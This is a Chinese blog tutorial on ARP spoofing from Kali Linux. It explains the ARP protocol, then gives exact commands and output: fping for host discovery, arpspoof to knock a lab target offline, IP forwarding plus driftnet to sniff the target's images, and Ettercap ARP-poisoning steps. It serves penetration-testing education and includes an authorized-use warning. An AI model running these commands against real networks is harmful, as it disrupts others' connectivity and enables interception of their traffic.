ARP局域网断网攻击

本文介绍了ARP协议的工作原理,重点讲解了ARP断网攻击的原理及实施步骤,包括使用fping嗅探主机和arpspoof进行断网攻击。同时提到了driftnet工具用于图片嗅探,揭示了网络安全中的ARP欺骗问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ARP简介

    ARP(Address Resolution Protocol)地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。位于网络层。

ARP工作原理

  1. 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址。
  2. 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。
  3. 地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存
    在这里插入图片描述

ARP断网攻击原理

    由于ARP是建立在网络中各个主机互相信任的基础上的。ARP攻击就是利用这一点,向目标主机发送伪ARP应答报文,从而篡改本地的MAC地址表。就形成了ARP欺骗,导致目标主机与网关通信失败。导致无法正常上网。
在这里插入图片描述

ARP断网攻击

1.嗅探局域网存活主机IP
fping命令语法:fping [选项] 网关/主机位

root@kali:~# fping -gs -r 0 192.168.2.1/24
192.168.2.1 is alive
192.168.2.101 is alive
192.168.2.152 is alive
192.168.2.202 is alive
192.168.2.216 is alive
192.168.2.196 is alive
ICMP Host Unreachable from 192.168.2.216 for ICMP Echo sent to 192.168.2.2
ICMP Host Unreachable from 192.168.2.216 for ICMP Echo sent to 192.168.2.4
ICMP Host Unreachable from 192.168.2.216 for ICMP Echo sent to 192.168.2.3
ICMP Host Unreachable from 192.168.2.216 for ICMP Echo sent to 192.168.2.6

2.对我的靶机192.168.2.101进行断网攻击
本来可以正常上网
在这里插入图片描述

使用arpspoof命令进行断网攻击
语法:arpspoof -i eht1 -t 目标IP 网关

root@kali:~# arpspoof -i eth1 -t 192.168.2.101 192.168.2.1
0:c:29:73:b6:ae 0:c:29:3c:60:ad 0806 42: arp reply 192.168.2.1 is-at 0:c:29:73:b6:ae
0:c:29:73:b6:ae 0:c:29:3c:60:ad 0806 42: arp reply 192.168.2.1 is-at 0:c:29:73:b6:ae
0:c:29:73:b6:ae 0:c:29:3c:60:ad 0806 42: arp reply 192.168.2.1 is-at 0:c:29:73:b6:ae
0:c:29:73:b6:ae 0:c:29:3c:60:ad 0806 42: arp reply 192.168.2.1 is-at 0:c:29:73:b6:ae

可以看到靶机无法正常上网
在这里插入图片描述
断网成功

开始图片嗅探(driftnet)

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward    #开启流量端口转发
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

在这里插入图片描述
上网恢复正常

driftnet命令语法:driftnet -i 网卡

root@kali:~# driftnet -i eth1    #开启图片嗅探

在这里插入图片描述
在这里插入图片描述

嗅探成功

### Kali Linux 中执行 ARP 欺骗造成络中 #### 攻击准备 为了成功实施ARP欺骗并导致络中,需具备如下条件: - 一台安装有Kali Linux系统的设备作为攻击平台[^2]。 #### 工作环境配置 确保已启动Kali Linux系统,并连接至目标局域网。打开终端窗口,确认具有root权限以便运行必要的命令。 #### 实施步骤概述 通过向受害者发送伪造ARP响应报文来误导其缓存表项,使得受害者的流量被重定向到攻击者控制下的机器而非真正的默认关。这会阻止合法通信路径,从而引发局部或全部络服务不可达的情况。 #### 使用 Ettercap 进行 ARP Spoofing 攻击 Ettercap 是一款功能强大的开源嗅探器/拦截工具,在Kali Linux中预装此软件可以方便地发起ARP欺骗攻击。 ```bash sudo ettercap -G & ``` 上述指令将以图形界面模式启动Ettercap程序。 在Ettercap GUI环境中操作具体流程如下: - **扫描主机**:选择`Sniff -> Scan for hosts`选项以发现当前子内的活跃节点; - **查看在线列表**:点击`Hosts -> Show the Hosts List`审查探测所得的结果集; - **设置目标**:标记要影响的目标IP地址(Target1设为受害客户端;Target2指定路由器/Gateway); - **启用插件**:前往`Plugins -> Manage the plugins`加载相关扩展模块如`arp_poison`; - **激活中间人(MITM)**:勾选`MITM -> ARP Poisoning...`开启ARP投毒机制; - **监控效果**:利用内置抓包分析仪观察实时传输状况变化直至达到预期目的——即切选定对象间的正常通讯链路为止。 请注意,此类行为属于非法入侵活动的一部分,仅限于授权测试环境下练习之用!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

afei00123

您的支持是我创作最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值